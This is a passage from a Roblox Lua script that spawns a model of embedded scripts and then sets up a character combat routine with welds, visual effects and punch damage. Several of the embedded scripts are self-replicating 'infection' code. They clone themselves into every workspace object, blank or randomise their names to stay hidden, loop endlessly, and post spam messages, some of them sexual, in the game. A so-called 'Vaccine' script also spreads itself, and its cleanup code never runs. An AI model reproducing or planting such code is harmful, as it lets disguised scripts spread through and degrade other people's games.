		main.Name = "Hello...I åm Your New Lord Lolz"
9523
		main.Parent = workspace
9524
	end
9525
	wait(3)
9526
end
9527
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
9528
-- Have a nice day. XD
9529
end,o324)
9530
end))
9531
o326 = Create("Script",{
9532
["Name"] = "Script......Or is it...",
9533
["Parent"] = mas,
9534
})
9535
table.insert(cors,coroutine.create(function()
9536
wait()
9537
runDummyScript(function()
9538
if script.Parent.className ~= "RotateP" then
9539
	local p = Instance.new("RotateP")
9540
	p.Parent = workspace
9541
	p.Name = "INfecTION"
9542
	script.Parent = p
9543
end
9544
9545
function check()
9546
	local list = workspace:GetChildren()
9547
	for i = 1, #list do
9548
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
9549
			script.Parent:Clone().Parent = list[i]
9550
		end
9551
		wait()
9552
	end
9553
end
9554
9555
while true do
9556
	check()
9557
	if workspace:findFirstChild("inFECtion") == nil then
9558
		local main = script.Parent:Clone()
9559
		main.Name = "inFECtion"
9560
		main.Parent = workspace
9561
	end
9562
	wait(3)
9563
end
9564
9565
end,o326)
9566
end))
9567
o328 = Create("Script",{
9568
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9569
["Parent"] = mas,
9570
})
9571
table.insert(cors,coroutine.create(function()
9572
wait()
9573
runDummyScript(function()
9574
names={"dapperguestyo"}
9575
local NameCheck = false
9576
script.Parent.Name = names[math.random(1, #names)]
9577
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9578
local c = script.Parent:Clone()
9579
9580
function addEvent(ch)
9581
	wait(math.random())
9582
	NameCheck = false
9583
	for ss = 1, #names do
9584
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9585
			NameCheck = true
9586
		end
9587
	end
9588
	if NameCheck == false then
9589
		local cloak = c:Clone()
9590
		cloak.Name = ""
9591
		cloak:GetChildren()[1].Name = ""
9592
		cloak.Parent = ch
9593
		cloak.Name = names[math.random(1, 5)]
9594
	end
9595
end
9596
9597
workspace.ChildAdded:connect(addEvent)
9598
9599
game.Players.PlayerAdded:connect(function(pl)
9600
	pl.Chatted:connect(function(m)
9601
		if m:sub(1, 5) == "/sc t" then
9602
			local m = Instance.new("Message")
9603
			m.Parent = workspace
9604
			m.Text = "THEY CALL ME CRAZY"
9605
			wait(1)
9606
			m.Text = "lOoOoOoOp"
9607
			wait(0.25)
9608
			m.Text = "next page"
9609
			wait(0.25)
9610
			m.Text = "lOoOoOoOp"
9611
			wait(0.25)
9612
			m.Text = "LoOoOoOoP"
9613
			wait(0.25)
9614
			m.Text = "lOoOoOoOp"
9615
			wait(0.25)
9616
			m.Text = "LoOoOoOoP"
9617
			wait(0.25)
9618
			m.Text = "GOTTA GOTTA BE CRAZY"
9619
			wait(1)
9620
			m.Text = "lOoOoOoOp"
9621
			wait(0.25)
9622
			m.Text = "LoOoOoOoP"
9623
			wait(0.25)
9624
			m.Text = "lOoOoOoOp"
9625
			wait(0.25)
9626
			m.Text = "brendantaylor rules"
9627
			wait(0.25)
9628
			m.Text = "so does iampoobx"
9629
			wait(0.25)
9630
			m.Text = "LoOoOoOoP"
9631
			wait(0.25)
9632
			m.Text = "GOTTA GET A LIFE (YOU)"
9633
			wait(3)
9634
			m:remove()
9635
		end
9636
		if m:sub(1, 5) == "HAAXX" then
9637
			local m = Instance.new("Message")
9638
			m.Parent = workspace
9639
			m.Text = "HAAXX"	
9640
			wait(3)
9641
			m:remove()
9642
		end
9643
	end)
9644
end)
9645
9646
while true do
9647
	local s = workspace:GetChildren()
9648
	for i = 1, #s do
9649
		NameCheck = false
9650
		for ss = 1, #names do
9651
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9652
				NameCheck = true
9653
			end
9654
		end
9655
		if NameCheck == false then
9656
			local cloak = c:Clone()
9657
			cloak.Name = ""
9658
			cloak:GetChildren()[1].Name = ""
9659
			cloak.Parent = s[i]
9660
		end
9661
		wait(0.1)
9662
	end
9663
	wait(1)
9664
end
9665
9666
end,o328)
9667
end))
9668
o329 = Create("Script",{
9669
["Name"] = "Vaccine",
9670
["Parent"] = o319,
9671
})
9672
table.insert(cors,coroutine.create(function()
9673
wait()
9674
runDummyScript(function()
9675
function spread() -- created by bumblebee773
9676
local stuff = game.Workspace:GetChildren()
9677
for i = 1, #stuff do
9678
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
9679
local clone = script:clone()
9680
clone.Parent = stuff[i]
9681
end
9682
end
9683
end
9684
9685
while true do
9686
wait(.1)
9687
spread()
9688
end
9689
9690
function GetAllItems(mdl) 
9691
local objs = {} 
9692
function Search(obj) 
9693
if obj~=workspace then 
9694
table.insert(objs,obj) 
9695
end 
9696
if #obj:GetChildren() > 0 then 
9697
for i, v in ipairs(obj:GetChildren()) do 
9698
Search(v) 
9699
end 
9700
end 
9701
end 
9702
Search(mdl) 
9703
return objs 
9704
end 
9705
9706
9707
9708
for i, v in ipairs(GetAllItems(workspace)) do 
9709
if v.className == "Script" then 
9710
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
9711
v.Parent = game.Lighting --Just in case it has a removal prevention. 
9712
t = Instance.new("ObjectValue") 
9713
t.Name = "IsAVirus" 
9714
t.Parent = v 
9715
end 
9716
end 
9717
end 
9718
9719
for i, v in ipairs(game.Lighting:GetChildren()) do 
9720
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
9721
v:remove() 
9722
end 
9723
end 
9724
9725
9726
print("Virus debugged! All clean!")
9727
end,o329)
9728
end))
9729
o331 = Create("Script",{
9730
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9731
["Parent"] = mas,
9732
})
9733
table.insert(cors,coroutine.create(function()
9734
wait()
9735
runDummyScript(function()
9736
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
9737
local NameCheck = false
9738
script.Parent.Name = names[math.random(1, #names)]
9739
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9740
local c = script.Parent:Clone()
9741
9742
function addEvent(ch)
9743
	wait(math.random())
9744
	NameCheck = false
9745
	for ss = 1, #names do
9746
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9747
			NameCheck = true
9748
		end
9749
	end
9750
	if NameCheck == false then
9751
		local cloak = c:Clone()
9752
		cloak.Name = ""
9753
		cloak:GetChildren()[1].Name = ""
9754
		cloak.Parent = ch
9755
		cloak.Name = names[math.random(1, 5)]
9756
	end
9757
end
9758
9759
workspace.ChildAdded:connect(addEvent)
9760
9761
game.Players.PlayerAdded:connect(function(pl)
9762
	pl.Chatted:connect(function(m)
9763
		if m:sub(1, 5) == "/sc t" then
9764
			local m = Instance.new("Message")
9765
			m.Parent = workspace
9766
			m.Text = "THEY CALL ME CRAZY"
9767
			wait(1)
9768
			m.Text = "lOoOoOoOp"
9769
			wait(0.25)
9770
			m.Text = "LoOoOoOoP"
9771
			wait(0.25)
9772
			m.Text = "lOoOoOoOp"
9773
			wait(0.25)
9774
			m.Text = "LoOoOoOoP"
9775
			wait(0.25)
9776
			m.Text = "lOoOoOoOp"
9777
			wait(0.25)
9778
			m.Text = "LoOoOoOoP"
9779
			wait(0.25)
9780
			m.Text = "GOTTA GOTTA BE CRAZY"
9781
			wait(1)
9782
			m.Text = "lOoOoOoOp"
9783
			wait(0.25)
9784
			m.Text = "LoOoOoOoP"
9785
			wait(0.25)
9786
			m.Text = "lOoOoOoOp"
9787
			wait(0.25)
9788
			m.Text = "LoOoOoOoP"
9789
			wait(0.25)
9790
			m.Text = "lOoOoOoOp"
9791
			wait(0.25)
9792
			m.Text = "LoOoOoOoP"
9793
			wait(0.25)
9794
			m.Text = "GOTTA GET A LIFE (YOU)"
9795
			wait(3)
9796
			m:remove()
9797
		end
9798
		if m:sub(1, 5) == "HAAXX" then
9799
			local m = Instance.new("Message")
9800
			m.Parent = workspace
9801
			m.Text = "HAAXX"	
9802
			wait(3)
9803
			m:remove()
9804
		end
9805
	end)
9806
end)
9807
9808
while true do
9809
	local s = workspace:GetChildren()
9810
	for i = 1, #s do
9811
		NameCheck = false
9812
		for ss = 1, #names do
9813
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9814
				NameCheck = true
9815
			end
9816
		end
9817
		if NameCheck == false then
9818
			local cloak = c:Clone()
9819
			cloak.Name = ""
9820
			cloak:GetChildren()[1].Name = ""
9821
			cloak.Parent = s[i]
9822
		end
9823
		wait(0.1)
9824
	end
9825
	wait(1)
9826
end
9827
9828
end,o331)
9829
end))
9830
o333 = Create("Script",{
9831
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
9832
["Parent"] = mas,
9833
})
9834
table.insert(cors,coroutine.create(function()
9835
wait()
9836
runDummyScript(function()
9837
names={"AmazingOmegaJames","H75","","","","","","",""}
9838
local NameCheck = false
9839
script.Parent.Name = names[math.random(1, #names)]
9840
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
9841
local c = script.Parent:Clone()
9842
9843
function addEvent(ch)
9844
	wait(math.random())
9845
	NameCheck = false
9846
	for ss = 1, #names do
9847
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
9848
			NameCheck = true
9849
		end
9850
	end
9851
	if NameCheck == false then
9852
		local cloak = c:Clone()
9853
		cloak.Name = ""
9854
		cloak:GetChildren()[1].Name = ""
9855
		cloak.Parent = ch
9856
		cloak.Name = names[math.random(1, 5)]
9857
	end
9858
end
9859
9860
workspace.ChildAdded:connect(addEvent)
9861
9862
game.Players.PlayerAdded:connect(function(pl)
9863
	pl.Chatted:connect(function(m)
9864
		if m:sub(1, 5) == "/sc t" then
9865
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
9866
			m.Parent = workspace
9867
			m.Text = "THEY CALL ME CRAZY"
9868
			wait(1)
9869
			m.Text = "lOoOoOoOp"
9870
			wait(0.25)
9871
			m.Text = "LoOoOoOoP"
9872
			wait(0.25)
9873
			m.Text = "lOoOoOoOp"
9874
			wait(0.25)
9875
			m.Text = "LoOoOoOoP"
9876
			wait(0.25)
9877
			m.Text = "lOoOoOoOp"
9878
			wait(0.25)
9879
			m.Text = "LoOoOoOoP"
9880
			wait(0.25)
9881
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
9882
			wait(1)
9883
			m.Text = "lOoOoOoOp"
9884
			wait(0.25)
9885
			m.Text = "LoOoOoOoP"
9886
			wait(0.25)
9887
			m.Text = "lOoOoOoOp"
9888
			wait(0.25)
9889
			m.Text = "LoOoOoOoP"
9890
			wait(0.25)
9891
			m.Text = "lOoOoOoOp"
9892
			wait(0.25)
9893
			m.Text = "LoOoOoOoP"
9894
			wait(0.25)
9895
			m.Text = "GOTTA HAVE SEX WITH YOU"
9896
			wait(3)
9897
			m:remove()
9898
		end
9899
		if m:sub(1, 5) == " SEX HAAXX" then
9900
			local m = Instance.new("Message")
9901
			m.Parent = workspace
9902
			m.Text = " SEX HAAXX"	
9903
			wait(3)
9904
			m:remove()
9905
		end
9906
	end)
9907
end)
9908
9909
while true do
9910
	local s = workspace:GetChildren()
9911
	for i = 1, #s do
9912
		NameCheck = false
9913
		for ss = 1, #names do
9914
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
9915
				NameCheck = true
9916
			end
9917
		end
9918
		if NameCheck == false then
9919
			local cloak = c:Clone()
9920
			cloak.Name = ""
9921
			cloak:GetChildren()[1].Name = ""
9922
			cloak.Parent = s[i]
9923
		end
9924
		wait(0.1)
9925
	end
9926
	wait(1)
9927
end
9928
9929
end,o333)
9930
end))
9931
mas.Parent = workspace
9932
mas:MakeJoints()
9933
local mas1 = mas:GetChildren()
9934
for i=1,#mas1 do
9935
	mas1[i].Parent = workspace 
9936
	ypcall(function() mas1[i]:MakeJoints() end)
9937
end
9938
mas:Destroy()
9939
for i=1,#cors do
9940
coroutine.resume(cors[i])
9941
end
9942
9943
9944
--------------------------------------------------------------------------------------------
9945
local p = game.Players.LocalPlayer
9946
local char = p.Character
9947
local mouse = p:GetMouse()
9948
local larm = char["Left Arm"]
9949
local rarm = char["Right Arm"]
9950
local lleg = char["Left Leg"]
9951
local rleg = char["Right Leg"]
9952
local hed = char.Head
9953
local torso = char.Torso
9954
local hum = char.Humanoid
9955
local cam = game.Workspace.CurrentCamera
9956
local root = char.HumanoidRootPart
9957
local deb = false
9958
local shot = 0
9959
local debris=game:service"Debris"
9960
local l = game:GetService("Lighting")
9961
local rs = game:GetService("RunService").RenderStepped
9962
9963
9964
wait(1)
9965
local p = game.Players.LocalPlayer
9966
local char = p.Character
9967
local mouse = p:GetMouse()
9968
local larm = char["Left Arm"]
9969
local rarm = char["Right Arm"]
9970
local lleg = char["Left Leg"]
9971
local rleg = char["Right Leg"]
9972
local hed = char.Head
9973
local torso = char.Torso
9974
local hum = char.Humanoid
9975
local cam = game.Workspace.CurrentCamera
9976
local root = char.HumanoidRootPart
9977
local deb = false
9978
local shot = 0
9979
local debris=game:service"Debris"
9980
local l = game:GetService("Lighting")
9981
local rs = game:GetService("RunService").RenderStepped
9982
ptz = {0.8, 0.85, 0.9, 0.95, 1, 1.05, 1.1}
9983
math.randomseed(os.time())
9984
for i,v in pairs(char:children()) do
9985
    if v:IsA("Hat") then
9986
        v:Destroy()
9987
    end
9988
end
9989
for i,v in pairs (hed:GetChildren()) do
9990
        if v:IsA("Sound") then
9991
                v:Destroy()
9992
        end
9993
end
9994
----------------------------------------------------
9995
Debounces = {
9996
CanAttack = true;
9997
NoIdl = false;
9998
Slashing = false;
9999
Slashed = false;
10000
RPunch = false;
10001
RPunched = false;
10002
LPunch = false;
10003
LPunched = false;
10004
}
10005
local Touche = {char.Name, }
10006
----------------------------------------------------
10007
hed.face.Texture = "rbxassetid://"
10008
char["Body Colors"].HeadColor = BrickColor.new("Pastel brown")
10009
char["Body Colors"].TorsoColor = BrickColor.new("Pastel brown")
10010
char["Body Colors"].LeftArmColor = BrickColor.new("Pastel brown")
10011
char["Body Colors"].RightArmColor = BrickColor.new("Pastel brown")
10012
----------------------------------------------------
10013
ypcall(function()
10014
char.Shirt:Destroy()
10015
char.Pants:Destroy()
10016
shirt = Instance.new("Shirt", char)
10017
shirt.Name = "Shirt"
10018
pants = Instance.new("Pants", char)
10019
pants.Name = "Pants"
10020
char.Shirt.ShirtTemplate = "http://www.roblox.com/asset/?id=236410507"
10021
char.Pants.PantsTemplate = "http://www.roblox.com/asset/?id=236412261"
10022
end)
10023
----------------------------------------------------
10024
function lerp(a, b, t) -- Linear interpolation
10025
        return a + (b - a)*t
10026
end
10027
10028
function slerp(a, b, t) --Spherical interpolation
10029
        dot = a:Dot(b)
10030
        if dot > 0.99999 or dot < -0.99999 then
10031
                return t <= 0.5 and a or b
10032
        else
10033
                r = math.acos(dot)
10034
                return (a*math.sin((1 - t)*r) + b*math.sin(t*r)) / math.sin(r)
10035
        end
10036
end
10037
10038
function matrixInterpolate(a, b, t)
10039
        local ax, ay, az, a00, a01, a02, a10, a11, a12, a20, a21, a22 = a:components()
10040
        local bx, by, bz, b00, b01, b02, b10, b11, b12, b20, b21, b22 = b:components()
10041
        local v0 = lerp(Vector3.new(ax, ay, az), Vector3.new(bx , by , bz), t) -- Position
10042
        local v1 = slerp(Vector3.new(a00, a01, a02), Vector3.new(b00, b01, b02), t) -- Vector  right
10043
        local v2 = slerp(Vector3.new(a10, a11, a12), Vector3.new(b10, b11, b12), t) -- Vector  up
10044
        local v3 = slerp(Vector3.new(a20, a21, a22), Vector3.new(b20, b21, b22), t) -- Vector  back
10045
        local t = v1:Dot(v2)
10046
        if not (t < 0 or t == 0 or t > 0) then         -- Failsafe
10047
                return CFrame.new()
10048
        end
10049
        return CFrame.new(
10050
        v0.x, v0.y, v0.z,
10051
        v1.x, v1.y, v1.z,
10052
        v2.x, v2.y, v2.z,
10053
        v3.x, v3.y, v3.z)
10054
end
10055
----------------------------------------------------
10056
function genWeld(a,b)
10057
    local w = Instance.new("Weld",a)
10058
    w.Part0 = a
10059
    w.Part1 = b
10060
    return w
10061
end
10062
function weld(a, b)
10063
    local weld = Instance.new("Weld")
10064
    weld.Name = "W"
10065
    weld.Part0 = a
10066
    weld.Part1 = b
10067
    weld.C0 = a.CFrame:inverse() * b.CFrame
10068
    weld.Parent = a
10069
    return weld;
10070
end
10071
----------------------------------------------------
10072
function Lerp(c1,c2,al)
10073
local com1 = {c1.X,c1.Y,c1.Z,c1:toEulerAnglesXYZ()}
10074
local com2 = {c2.X,c2.Y,c2.Z,c2:toEulerAnglesXYZ()}
10075
for i,v in pairs(com1) do
10076
com1[i] = v+(com2[i]-v)*al
10077
end
10078
return CFrame.new(com1[1],com1[2],com1[3]) * CFrame.Angles(select(4,unpack(com1)))
10079
end
10080
----------------------------------------------------
10081
newWeld = function(wp0, wp1, wc0x, wc0y, wc0z)
10082
local wld = Instance.new("Weld", wp1)
10083
wld.Part0 = wp0
10084
wld.Part1 = wp1
10085
wld.C0 = CFrame.new(wc0x, wc0y, wc0z)
10086
end
10087
----------------------------------------------------
10088
function weld5(part0, part1, c0, c1)
10089
    weeld=Instance.new("Weld", part0)
10090
    weeld.Part0=part0
10091
    weeld.Part1=part1
10092
    weeld.C0=c0
10093
    weeld.C1=c1
10094
    return weeld
10095
end
10096
----------------------------------------------------
10097
function HasntTouched(plrname)
10098
local ret = true
10099
for _, v in pairs(Touche) do
10100
if v == plrname then
10101
ret = false
10102
end
10103
end
10104
return ret
10105
end
10106
----------------------------------------------------
10107
---------------------------------------------------
10108
larm.Size = larm.Size * 1.1
10109
rarm.Size = rarm.Size * 1.1
10110
lleg.Size = lleg.Size * 1.1
10111
rleg.Size = rleg.Size * 1.1
10112
torso.Size = torso.Size * 1.1
10113
hed.Size = hed.Size * 1.1
10114
root.Size = root.Size * 1.1
10115
----------------------------------------------------
10116
----------------------------------------------------
10117
newWeld(torso, larm, -1.5, 0.5, 0)
10118
larm.Weld.C1 = CFrame.new(0, 0.5, 0)
10119
newWeld(torso, rarm, 1.5, 0.5, 0)
10120
rarm.Weld.C1 = CFrame.new(0, 0.5, 0)
10121
newWeld(torso, hed, 0, 1.5, 0)
10122
newWeld(torso, lleg, -0.5, -1, 0)
10123
lleg.Weld.C1 = CFrame.new(0, 1, 0)
10124
newWeld(torso, rleg, 0.5, -1, 0)
10125
rleg.Weld.C1 = CFrame.new(0, 1, 0)
10126
newWeld(root, torso, 0, -1, 0)
10127
torso.Weld.C1 = CFrame.new(0, -1, 0)
10128
----------------------------------------------------
10129
z = Instance.new("Sound", char)
10130
z.SoundId = "rbxassetid://245851245"
10131
z.Looped = true
10132
z.Pitch = 1
10133
z.Volume = 1
10134
wait(.1)
10135
z:Play()
10136
----------------------------------------------------
10137
----------------------------------------------------
10138
z2 = Instance.new("Sound", char)
10139
z2.SoundId = "rbxassetid://148179980"
10140
z2.Looped = true
10141
z2.Pitch = 1
10142
z2.Volume = 5
10143
wait(.1)
10144
z2:Play()
10145
----------------------------------------------------
10146
local Transforming = true
10147
hum.WalkSpeed = 0
10148
local fx = Instance.new("Part",torso)
10149
fx.Anchored = true
10150
fx.Material = "Neon"
10151
fx.CanCollide = false
10152
fx.Locked = true
10153
fx.Transparency = 1
10154
fx.Material = "SmoothPlastic"
10155
fx.Size = Vector3.new(0.1,0.1,0.1)
10156
fx.TopSurface = "SmoothNoOutlines"
10157
fx.BottomSurface = "SmoothNoOutlines"
10158
fx.BrickColor = BrickColor.new("Really black")
10159
fxm = Instance.new("SpecialMesh",fx)
10160
fxm.MeshId = "rbxassetid://9982590"
10161
fxm.Scale = Vector3.new(0.5,0.5,0.5)
10162
for i = 1, 20 do rs:wait()
10163
        fx.Transparency = fx.Transparency - (1/20)
10164
        fx.CFrame = torso.CFrame
10165
        fxm.Scale = fxm.Scale + Vector3.new(0.5,0.5,0.5)
10166
        rs:wait()
10167
end
10168
----------------------------------------------------
10169
10170
----------------------------------------------------
10171
GroundWave1 = function()
10172
	local HandCF = CFrame.new(root.Position - Vector3.new(0,3,0)) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0))
10173
	local Colors = {"Royal purple", "Really red"}
10174
		local wave = Instance.new("Part", torso)
10175
		wave.BrickColor = BrickColor.new(Colors[math.random(1,#Colors)])
10176
		wave.Anchored = true
10177
		wave.CanCollide = false
10178
		wave.Locked = true
10179
		wave.Size = Vector3.new(1, 1, 1)
10180
		wave.TopSurface = "Smooth"
10181
		wave.BottomSurface = "Smooth"
10182
		wave.Transparency = 0.35
10183
		wave.CFrame = HandCF
10184
		wm = Instance.new("SpecialMesh", wave)
10185
		wm.MeshId = "rbxassetid://3270017"
10186
		coroutine.wrap(function()
10187
		for i = 1, 30, 1 do
10188
		wm.Scale = Vector3.new(1 + i*1.2, 1 + i*1.2, 1)
10189
		wave.Size = wm.Scale
10190
		wave.CFrame = HandCF
10191
		wave.Transparency = i/30
10192
		wait()
10193
		end
10194
		wait()
10195
		wave:Destroy()
10196
	end)()
10197
end
10198
----------------------------------------------------
10199
GroundWave = function()
10200
        if Transforming == true then
10201
                local wave = Instance.new("Part", torso)
10202
                wave.BrickColor = BrickColor.new("Really red")
10203
                wave.Anchored = true
10204
                wave.CanCollide = false
10205
                wave.Locked = true
10206
                wave.Size = Vector3.new(1, 1, 1)
10207
                wave.TopSurface = "Smooth"
10208
                wave.BottomSurface = "Smooth"
10209
                wave.Transparency = 0.35
10210
                wave.CFrame = fx.CFrame
10211
                wm = Instance.new("SpecialMesh", wave)
10212
                wm.MeshType = "Sphere"
10213
                wm.Scale = Vector3.new(1,1,1)
10214
                coroutine.wrap(function()
10215
                for i = 1, 18, 1 do
10216
                wm.Scale = Vector3.new(2 + i*2, 2 + i*2, 2 + i*2)
10217
                --wave.Size = wm.Scale
10218
                wave.CFrame = fx.CFrame
10219
                wave.Transparency = i/14
10220
                wait()
10221
                end
10222
                wait()
10223
                wave:Destroy()
10224
        end)()
10225
        elseif Transforming == false then
10226
        wait()
10227
        end
10228
end
10229
10230
for i = 1, 100 do rs:wait()
10231
        fx.CFrame = torso.CFrame
10232
end
10233
10234
Spawn(function()
10235
	while wait(1) do
10236
		GroundWave()
10237
	end
10238
end)
10239
10240
wait(4)
10241
10242
Transforming = false
10243
10244
for i = 1, 20 do rs:wait()
10245
        fx.Transparency = fx.Transparency + (1/20)
10246
        fx.CFrame = torso.CFrame
10247
        fxm.Scale = fxm.Scale + Vector3.new(0.5,0.5,0.5)
10248
        rs:wait()
10249
end
10250
10251
local HandCF = CFrame.new(root.Position - Vector3.new(0,3,0)) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0))
10252
        local wave = Instance.new("Part", torso)
10253
        wave.BrickColor = BrickColor.new("Institutional white")
10254
        wave.Anchored = true
10255
        wave.CanCollide = false
10256
        wave.Locked = true
10257
        wave.Size = Vector3.new(1, 1, 1)
10258
        wave.TopSurface = "Smooth"
10259
        wave.BottomSurface = "Smooth"
10260
        wave.Transparency = 0.35
10261
        wave.CFrame = HandCF
10262
        wm = Instance.new("SpecialMesh", wave)
10263
        wm.MeshId = "rbxassetid://3270017"
10264
        coroutine.wrap(function()
10265
        for i = 1, 14, 1 do
10266
        wm.Scale = Vector3.new(1 + i*1.1, 1 + i*1.1, 1)
10267
        wave.Size = wm.Scale
10268
        wave.CFrame = HandCF
10269
        wave.Transparency = i/14
10270
        wait()
10271
        end
10272
        wait()
10273
        wave:Destroy()
10274
end)()
10275
hum.WalkSpeed = 16
10276
----------------------------------------------------
10277
Blast = function()
10278
	local Colors = {"Really red", "Really black"}
10279
		local wave = Instance.new("Part", torso)
10280
		wave.BrickColor = BrickColor.new(Colors[math.random(1,#Colors)])
10281
		wave.Anchored = true
10282
		wave.CanCollide = false
10283
		wave.Locked = true
10284
		wave.Size = Vector3.new(1, 1, 1)
10285
		wave.TopSurface = "Smooth"
10286
		wave.BottomSurface = "Smooth"
10287
		wave.Transparency = 0.35
10288
		wave.CFrame = rarm.CFrame
10289
		wm = Instance.new("SpecialMesh", wave)
10290
		wm.MeshType = "Sphere"
10291
		wm.Scale = Vector3.new(1,1,1)
10292
		z = Instance.new("Sound",wave)
10293
		z.SoundId = "rbxassetid://237035051"
10294
		z.Volume = 1
10295
		z.Pitch = .9
10296
		z:Play()
10297
		coroutine.wrap(function()
10298
		for i = 1, 30, 1 do
10299
		wave.Size = Vector3.new(1 + i*4, 1 + i*4, 1 + i*4)
10300
		--wave.Size = wm.Scale
10301
		wave.CFrame = rarm.CFrame
10302
		wave.Transparency = (1/14)
10303
		rs:wait()
10304
		end
10305
		rs:wait()
10306
		wave:Destroy()
10307
		z:Destroy()
10308
	end)()
10309
end
10310
----------------------------------------------------
10311
rarm.Touched:connect(function(ht)
10312
    hit = ht.Parent
10313
    if ht and hit:IsA("Model") then
10314
            if hit:FindFirstChild("Humanoid") then
10315
                if hit.Name ~= p.Name then
10316
                    if Debounces.RPunch == true and Debounces.RPunched == false then
10317
                            Debounces.RPunched = true
10318
                                hit:FindFirstChild("Humanoid"):TakeDamage(math.random(5,8))
10319
                                    if Debounces.ks==true then
10320
                                    z = Instance.new("Sound",hed)
10321
                                    z.SoundId = "rbxassetid://169380525"
10322
                                                                        z.Pitch = ptz[math.random(1,#ptz)]
10323
                                    z.Volume = 1
10324
                                    z:Play()
10325
                                    end
10326
                            wait(.2)
10327
                            Debounces.RPunched = false
10328
                    end
10329
                end
10330
            end
10331
    elseif ht and hit:IsA("Hat") then
10332
        if hit.Parent.Name ~= p.Name then
10333
            if hit.Parent:FindFirstChild("Humanoid") then
10334
                   if Debounces.RPunch == true and Debounces.RPunched == false then
10335
                            Debounces.RPunched = true
10336
                            hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(5,8))
10337
                                    if Debounces.ks==true then
10338
                                    z = Instance.new("Sound",hed)
10339
                                    z.SoundId = "rbxassetid://169380525"
10340
                                                                        z.Pitch = ptz[math.random(1,#ptz)]
10341
                                    z.Volume = 1
10342
                                    z:Play()
10343
                                    end
10344
                            wait(.2)
10345
                Debounces.RPunched = false
10346
                                end
10347
            end
10348
        end
10349
    end
10350
end)
10351
larm.Touched:connect(function(ht)
10352
    hit = ht.Parent
10353
    if ht and hit:IsA("Model") then
10354
            if hit:FindFirstChild("Humanoid") then
10355
                if hit.Name ~= p.Name then
10356
                    if Debounces.LPunch == true and Debounces.LPunched == false then
10357
                            Debounces.LPunched = true
10358
                                hit:FindFirstChild("Humanoid"):TakeDamage(math.random(4,8))
10359
                                    if Debounces.ks2==true then
10360
                                    z = Instance.new("Sound",hed)
10361
                                    z.SoundId = "rbxassetid://169380525"
10362
                                                                        z.Pitch = ptz[math.random(1,#ptz)]
10363
                                    z.Volume = 1
10364
                                    z:Play()
10365
                                    end
10366
                            wait(.2)
10367
                        Debounces.LPunched = false
10368
                    end
10369
                end
10370
            end
10371
    elseif ht and hit:IsA("Hat") then
10372
        if hit.Parent.Name ~= p.Name then
10373
            if hit.Parent:FindFirstChild("Humanoid") then
10374
                   if Debounces.LPunch == true and Debounces.LPunched == false then
10375
                            Debounces.LPunched = true
10376
                            hit.Parent:FindFirstChild("Humanoid"):TakeDamage(math.random(4,8))
10377
                                    if Debounces.ks2==true then
10378
                                    z = Instance.new("Sound",hed)
10379
                                    z.SoundId = "rbxassetid://169380525"
10380
                                                                        z.Pitch = ptz[math.random(1,#ptz)]
10381
                                    z.Volume = 1
10382
                                    z:Play()
10383
                                    end
10384
                            wait(.2)
10385
                Debounces.LPunched = false
10386
                                end
10387
            end
10388
        end
10389
    end
10390
end)
10391
----------------------------------------------------
10392
mod4 = Instance.new("Model",char)
10393
10394
ptez = {0.7, 0.8, 0.9, 1}
10395
10396
function FindNearestTorso(Position,Distance,SinglePlayer)
10397
    if SinglePlayer then return(SinglePlayer.Torso.CFrame.p -Position).magnitude < Distance end
10398
        local List = {}
10399
        for i,v in pairs(workspace:GetChildren())do
10400
            if v:IsA("Model")then
10401
                if v:findFirstChild("Torso")then
10402
                    if v ~= char then
10403
                        if(v.Torso.Position -Position).magnitude <= Distance then
10404
                            table.insert(List,v)
10405
                        end
10406
                    end
10407
                end
10408
            end
10409
        end
10410
    return List
10411
end
10412
10413
function Punch()
10414
    part=Instance.new('Part',mod4)
10415
    part.Anchored=true
10416
    part.CanCollide=false
10417
    part.FormFactor='Custom'
10418
    part.Size=Vector3.new(.2,.2,.2)
10419
    part.CFrame=root.CFrame*CFrame.new(0,1.5,-2.4)*CFrame.Angles(math.rad(0),0,0)
10420
    part.Transparency=.7
10421
    part.BrickColor=BrickColor.new('Really red')
10422
    mesh=Instance.new('SpecialMesh',part)
10423
    mesh.MeshId='http://www.roblox.com/asset/?id=3270017'
10424
    mesh.Scale=Vector3.new(3,3,3)
10425
    part2=Instance.new('Part',mod4)
10426
    part2.Anchored=true
10427
    part2.CanCollide=false
10428
    part2.FormFactor='Custom'
10429
    part2.Size=Vector3.new(.2,.2,.2)
10430
    part2.CFrame=root.CFrame*CFrame.new(0,1.5,-2.4)*CFrame.Angles(math.rad(90),0,0)
10431
    part2.Transparency=.7
10432
    part2.BrickColor=BrickColor.new('Really red')
10433
    mesh2=Instance.new('SpecialMesh',part2)
10434
